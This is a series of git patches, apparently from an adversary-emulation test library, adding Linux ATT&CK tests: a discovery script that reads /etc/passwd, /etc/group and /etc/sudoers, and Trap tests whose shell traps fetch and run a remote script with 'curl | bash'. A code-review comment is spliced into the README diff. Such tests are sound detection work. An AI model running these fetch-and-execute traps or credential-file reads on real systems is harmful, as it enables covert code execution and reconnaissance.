From 80bdcf5f104b3642962e69c94bf64287c7f12f94 Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Thu, 8 Feb 2018 17:31:39 -0600
Subject: [PATCH 1/3] Work in progress Linux discovery payload

---
 Linux/Payloads/Discovery.sh | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 Linux/Payloads/Discovery.sh

diff --git a/Linux/Payloads/Discovery.sh b/Linux/Payloads/Discovery.sh
new file mode 100644
index 00000000..d2d4394c
--- /dev/null
+++ b/Linux/Payloads/Discovery.sh
@@ -0,0 +1,14 @@
+#! /bin/bash
+cat /etc/*-release
+uname -ar
+ifconfig
+cat /etc/resolv.conf
+df -h
+cat /etc/fstab
+cat /etc/passwd
+cat /etc/group
+cat /etc/sudoers
+last
+yum list installed
+chkconfig --list #works with RHEL/CentOS 6, not 7
+systemctl list-unit-files #works with RHEL/CentOS 7, not 6
\ No newline at end of file
From bb5a0181f2c102bde796e068e947b455b1f84ea6 Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Tue, 13 Feb 2018 15:10:47 -0600
Subject: [PATCH 2/3] Adding Persistence and Execution tests for Trap

---
 Linux/Execution/Trap.md | 14 ++++++++++++++
 Linux/Payloads/echo-art-fish.sh | 2 ++
 Linux/Persistence/Trap.md | 10 ++++++++++
 Linux/README.md | 2 +-
 4 files changed, 27 insertions(+), 1 deletion(-)
 create mode 100644 Linux/Execution/Trap.md
 create mode 100644 Linux/Payloads/echo-art-fish.sh
 create mode 100644 Linux/Persistence/Trap.md

diff --git a/Linux/Execution/Trap.md b/Linux/Execution/Trap.md
new file mode 100644
index 00000000..a3f0c63e
--- /dev/null
+++ b/Linux/Execution/Trap.md
@@ -0,0 +1,14 @@
+# Trap
+
+MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
+
+
+ trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
+
+ exit
+
+After exiting the shell, the script will download and execute.
+
+ trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' INT
+
+After sending a keyboard interrupt (CTRL+C) the script will download and execute.
\ No newline at end of file
diff --git a/Linux/Payloads/echo-art-fish.sh b/Linux/Payloads/echo-art-fish.sh
new file mode 100644
index 00000000..15e6e8d0
--- /dev/null
+++ b/Linux/Payloads/echo-art-fish.sh
@@ -0,0 +1,2 @@
+#! /bin/bash
+echo So long, and thanks for all the fish! > /tmp/art-fish.txt
\ No newline at end of file
diff --git a/Linux/Persistence/Trap.md b/Linux/Persistence/Trap.md
new file mode 100644
index 00000000..cc3a46f4
--- /dev/null
+++ b/Linux/Persistence/Trap.md
@@ -0,0 +1,10 @@
+# Trap
+
+MITRE ATT&CK Technique: [T1154](https://attack.mitre.org/wiki/Technique/T1154)
+
+
+ trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Linux/Payloads/echo-art-fish.sh | bash' EXIT
+
+ exit
+
+After exiting the shell, the script will download and execute.
\ No newline at end of file
diff --git a/Linux/README.md b/Linux/README.md
index 74f77e48..4e0b6e4c 100644
--- a/Linux/README.md
+++ b/Linux/README.md
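Review bot: The message on the second line of echo-art-fish.sh is handed to echo as seven unquoted words, so the exclamation mark and commas only pass through because bash runs scripts with history expansion off; quoting the string keeps it literal wherever the line is pasted: `echo 'So long, and thanks for all the fish!' > /tmp/art-fish.txt`. The fixed path under /tmp is presumably the artifact a detection is meant to look for, but if a file of that name already exists and belongs to another user the redirect will fail or clobber it, so a one-line comment above it naming the expected artifact would help whoever runs the test. Both Trap.md hunks in this commit fetch this script by raw URL from the repository's master branch, so the documented tests only resolve once this file has actually been merged there.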
@@ -8,7 +8,7 @@
 | Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
 | Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
 | Redundant Access | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
-| Trap | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
+| [Trap](Persistence/Trap.md) | | Hidden Files and Directories | Network Sniffing | [System Information Discovery](Discovery/System_Information_Discovery.md) | | [Trap](Execution/Trap.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
 | Valid Accounts | | Indicator Removal from Tools | Private Keys | [System Network Configuration Discovery](Discovery/System_Network_Configuration_Discovery.md) | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels |
 | Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | System Network Connections Discovery | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels |
 | | | Install Root Certificate | | System Owner/User Discovery | | | | | Multiband Communication |
From 03bcfd5c0433fe8de12bcc3e3e365a66fc27ba11 Mon Sep 17 00:00:00 2001
From: Tony M Lambert
Date: Tue, 13 Feb 2018 15:13:32 -0600
Subject: [PATCH 3/3] Delete Discovery.sh

---
 Linux/Payloads/Discovery.sh | 14 --------------
 1 file changed, 14 deletions(-)
 delete mode 100644 Linux/Payloads/Discovery.sh

diff --git a/Linux/Payloads/Discovery.sh b/Linux/Payloads/Discovery.sh
deleted file mode 100644
index d2d4394c..00000000
--- a/Linux/Payloads/Discovery.sh
+++ /dev/null
@@ -1,14 +0,0 @@
-#! /bin/bash
-cat /etc/*-release
-uname -ar
-ifconfig
-cat /etc/resolv.conf
-df -h
-cat /etc/fstab
-cat /etc/passwd
-cat /etc/group
-cat /etc/sudoers
-last
-yum list installed
-chkconfig --list #works with RHEL/CentOS 6, not 7
-systemctl list-unit-files #works with RHEL/CentOS 7, not 6
\ No newline at end of file